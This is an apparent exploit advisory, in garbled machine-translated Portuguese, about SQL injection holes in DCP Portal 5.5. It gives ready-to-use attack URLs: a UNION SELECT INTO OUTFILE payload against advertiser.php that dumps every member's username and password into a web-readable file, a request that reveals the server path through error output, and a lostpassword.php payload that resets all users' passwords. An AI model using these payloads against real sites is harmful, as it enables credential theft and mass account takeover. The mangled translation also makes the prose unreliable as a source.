DCP Portal - 5.5 holes

Nunca usa este produto se você tem desligado magic_quotes_gpc. E este produto não trabalhará de qualquer modo se você tem desligado register_globals.
Todo os arquivos no produto, dont checa para integridade de variáveis. Você pode facilmente explorar isto usando algumas técnicas de Injeção Do SQL. Por Exemplo, se você deseja obter username/password de todo os usuários, você pode explorar advertiser.php.
Abra isto gosta de,
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt
Isto está ao windows, se web-servidor está continuando *nix, então você podia entrar alguma coisa gosta de,
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/www/html/dcpad.txt
Neste casos, você necessitará entrar o caminho absoluto. Para que, corre o follwing
http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=' and that will show the path to the sever if they have turned on display_errors in php.ini.
Isto É Tudo ! Note que aqui nós estamos usando SINDICATO funciona em pergunta. Para que, o anfitrião deveria seria correr MySQL De versão 4.x. Bem, se isto não está correndo 4.x, Nenhum problema, nós temos outro arquivo !
Este tempo isto está lostpassword.php.
Abra isto:
http://localhost/dcp/lostpassword.php?action=lost&email=fake' or 1=1--'
Esta vontade realmente causa algum prejuízo. Isto reatribuirá senha de todas. Todos obterá como muitas correspondências como o número de usuários. E vontade de senha do evryone é o um fornecido no último email.
Eu não tive tempo para checar se havia injeção possível com algum campo numérico. Se isto está lá, um pode lançar selecionados-peixe ataques, que poderiam trabalhar até mesmo em caso de magic_quotes_gpc está em.
http://www.crack's S.A.rg3.net/